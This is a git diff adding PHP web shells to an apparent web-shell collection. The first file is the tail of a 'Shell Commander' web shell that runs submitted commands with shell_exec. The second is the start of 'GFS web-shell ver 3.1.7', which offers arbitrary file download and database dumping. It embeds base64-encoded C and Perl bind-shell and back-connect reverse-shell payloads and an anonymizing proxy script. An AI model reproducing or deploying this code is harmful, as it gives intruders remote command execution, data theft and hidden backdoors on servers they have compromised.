+            $_SESSION['output'] .= substr($pr_login, 0, -1) . " $_POST[cmd]\n"; 
+            $prompt = $pr_pass; 
+        } 
+    } 
+
+} else { //........................................................ LOGGED IN 
+
+
+
+                            /*=-- MEMBERS AREA --=*\ 
+                            \*=-- MEMBERS AREA --=*/ 
+
+
+    $prompt = set_prompt(); 
+
+    chdir($_SESSION['dir']); 
+
+    if ($_REQUEST['clear_hist']) //............................ CLEAR HISTORY 
+        $_SESSION['history'] = ""; 
+
+    if ($_SESSION['history']) $hist_arr = explode("\n", $_SESSION['history']); 
+
+    if ($_POST['cmd']) { 
+
+        if (!in_array($_POST['cmd'], $hist_arr)) { //......... ADD TO HISTORY 
+            $hist_arr[] = $_POST['cmd']; 
+            $_SESSION['history'] = implode("\n", $hist_arr); 
+        } 
+
+        if (count($hist_arr) > $history_lines) { //........... CUTOFF HISTORY 
+            $start = count($hist_arr) - $history_lines; 
+            $_SESSION['history'] = ""; 
+
+            for ($i = $start; $i < count($hist_arr); $i++) 
+                $_SESSION['history'] .= $hist_arr[$i] . "\n"; 
+
+            $_SESSION['history'] = substr($_SESSION['history'], 0, -1); 
+            $hist_arr = explode("\n", $_SESSION['history']); 
+        } 
+
+        $first_word = first_word($_POST['cmd']); 
+
+        if (array_key_exists($first_word, $alias)) { //. CHECKING FOR ALIASES 
+            $_POST['cmd'] = $alias[$first_word] . substr($_POST['cmd'], strlen($first_word)); 
+            $first_word = first_word($_POST['cmd']); 
+        } 
+
+        switch ($first_word) { 
+
+          case "clear": 
+            $_SESSION['output'] = ""; 
+            break; 
+
+          case "exit": 
+            session_destroy(); 
+            refresh(); 
+            break; 
+
+          case "cd": 
+            $_SESSION['output'] .= $prompt; 
+            $result = shell_exec($_POST['cmd'] . " 2>&1 ; pwd"); 
+            $result = explode("\n", $result); 
+            $_SESSION['dir'] = $result[count($result) - 2]; 
+
+            if (count($result) > 2) //.............. WE HAVE AN ERROR MESSAGE 
+                $result[0] = "\n" . substr($result[0], strpos($result[0], "cd: ")) . "\n"; 
+            else $result[0] = "\n"; 
+
+            $prompt = set_prompt(); 
+            $_SESSION['output'] .= $_POST['cmd'] . $result[0]; 
+            break; 
+
+          default: 
+            $result = shell_exec($_POST['cmd'] . " 2>&1"); 
+
+            if (substr($result, -1) != "\n") $result .= "\n"; 
+            $_SESSION['output'] .= $prompt . $_POST['cmd'] . "\n" . $result; 
+
+            $rows = preg_match_all('/\n/', $_SESSION['output'], $arr); 
+            unset($arr); 
+
+            if ($rows > $cache_lines) { 
+                preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['output'], $out); 
+                $_SESSION['output'] = $out[0] . "\n"; 
+            } 
+        } 
+    } 
+} 
+
+
+
+                             /*=-- FUNCTIONS --=*\ 
+                             \*=-- FUNCTIONS --=*/ 
+
+
+function my_encode($str) { 
+    $str = str_replace("\\\\", "\\", $str); 
+    $str = str_replace("\\\"", "\"", $str); 
+    $str = str_replace("\\'", "'", $str); 
+
+    while (strpos($str, "  ") !== false) $str = str_replace("  ", " ", $str); 
+
+    return rtrim(ltrim($str)); 
+} 
+
+function set_prompt() { 
+    global $_SESSION; 
+
+    return $_SESSION['whoami'] . "@" . $_SESSION['host'] . " " . substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ "; 
+} 
+
+function first_word($str) { 
+    list($str) = preg_split('/[ ;]/', $str); 
+    return $str; 
+} 
+
+function refresh() { 
+    global $_SERVER; 
+
+    $self = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1); 
+    header("Location: $self"); 
+    die; 
+} 
+
+
+
+                             /*=-- HTML PAGE --=*\ 
+                             \*=-- HTML PAGE --=*/ 
+
+
+$out = substr(preg_replace('/<\/(textarea)/i', '&lt;/\1', $_SESSION['output']), 0, -1); 
+
+?><HTML> 
+<HEAD> 
+
+  <TITLE>Shell Commander</TITLE> 
+  <STYLE TYPE="text/css"><!-- 
+
+    INPUT, TEXTAREA, SELECT, OPTION, TD { 
+        color: #BBBBBB; 
+        background-color: #000000; 
+        font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier; 
+    } 
+
+    TEXTAREA { 
+        overflow-y: auto; 
+        border-width: 0px; 
+        height: 100%; 
+        width: 100%; 
+        padding: 0px; 
+    } 
+
+    INPUT { 
+        border-width: 0px; 
+        height: 26px; 
+        width: 100%; 
+        padding-top: 5px; 
+    } 
+
+    SELECT, OPTION { 
+        color: #000000; 
+        background-color: #BBBBBB; 
+    } 
+
+    BODY { 
+        overflow-y: auto; 
+        margin: 0; 
+    } 
+
+  --></STYLE> 
+  <SCRIPT LANGUAGE="JavaScript"><!-- 
+
+hist_arr = new Array(); 
+
+<?php 
+
+foreach ($hist_arr as $key => $value) { 
+    $value = str_replace("\\", "\\\\", $value); 
+    $value = str_replace("\"", "\\\"", $value); 
+    echo "hist_arr[$key] = \"$value\";\n"; 
+} 
+
+?> 
+
+function parse_hist(key) { 
+    if (key < hist_arr.length) { 
+        if (key != "") { 
+            document.getElementById('input').value = hist_arr[key]; 
+            document.getElementById('input').focus(); 
+        } 
+    } else { 
+        window.location.href = "?clear_hist=1"; 
+    } 
+} 
+
+function input_focus() { 
+    document.getElementById('input').focus(); 
+} 
+
+function selection_to_clipboard() { // IE only! 
+    if (window.clipboardData && document.selection) 
+        window.clipboardData.setData("Text", document.selection.createRange().text); 
+} 
+
+if (window.clipboardData) 
+    document.oncontextmenu = new Function("document.getElementById('input').value = window.clipboardData.getData('Text'); input_focus(); return false"); 
+
+  --></SCRIPT> 
+</HEAD> 
+<BODY onLoad="document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0"> 
+<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%"> 
+<TR> 
+  <TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY><?= $out ?></TEXTAREA></TD> 
+</TR> 
+
+<TR> 
+  <TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%"> 
+    <TR> 
+    <FORM METHOD="POST" ACTION=""> 
+      <TD NOWRAP onClick="input_focus()"><?= substr($prompt, 0, -1) ?></TD> 
+      <TD WIDTH="100%"><INPUT ID="input" TYPE="<?= (!$_SESSION['user'] && $_SESSION['login']) ? 'PASSWORD' : 'TEXT' ?>" NAME="cmd"></TD> 
+    </FORM><?php 
+
+if ($hist_arr) { 
+
+    ?><TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)"> 
+        <OPTION VALUE="">--- HISTORY</OPTION><?php 
+
+    for ($i = count($hist_arr) - 1; $i >= 0; $i--) { 
+
+        if (strlen($hist_arr[$i]) > $history_chars) $option = substr($hist_arr[$i], 0, $history_chars - 3) . "..."; 
+        else $option = $hist_arr[$i]; 
+
+        echo "<OPTION VALUE=\"" . $i . "\">$option</OPTION>"; 
+    } 
+
+      ?><OPTION VALUE="<?= $history_lines + 1 ?>">--- CLEAR HISTORY</OPTION></SELECT></TD><?php 
+
+} 
+
+  ?></TR> 
+
+  </TABLE></TD> 
+</TR> 
+</TABLE> 
+
+<SCRIPT LANGUAGE="JavaScript"><!-- 
+document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; 
+--></SCRIPT> 
+
+</BODY> 
+</HTML>
\ No newline at end of file
diff --git a/138shell/G/GFS web-shell ver 3.1.7 - PRiV8.txt b/138shell/G/GFS web-shell ver 3.1.7 - PRiV8.txt
new file mode 100644
index 0000000..98fb031
--- /dev/null
+++ b/138shell/G/GFS web-shell ver 3.1.7 - PRiV8.txt	
@@ -0,0 +1,618 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåğåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ğåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèğîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
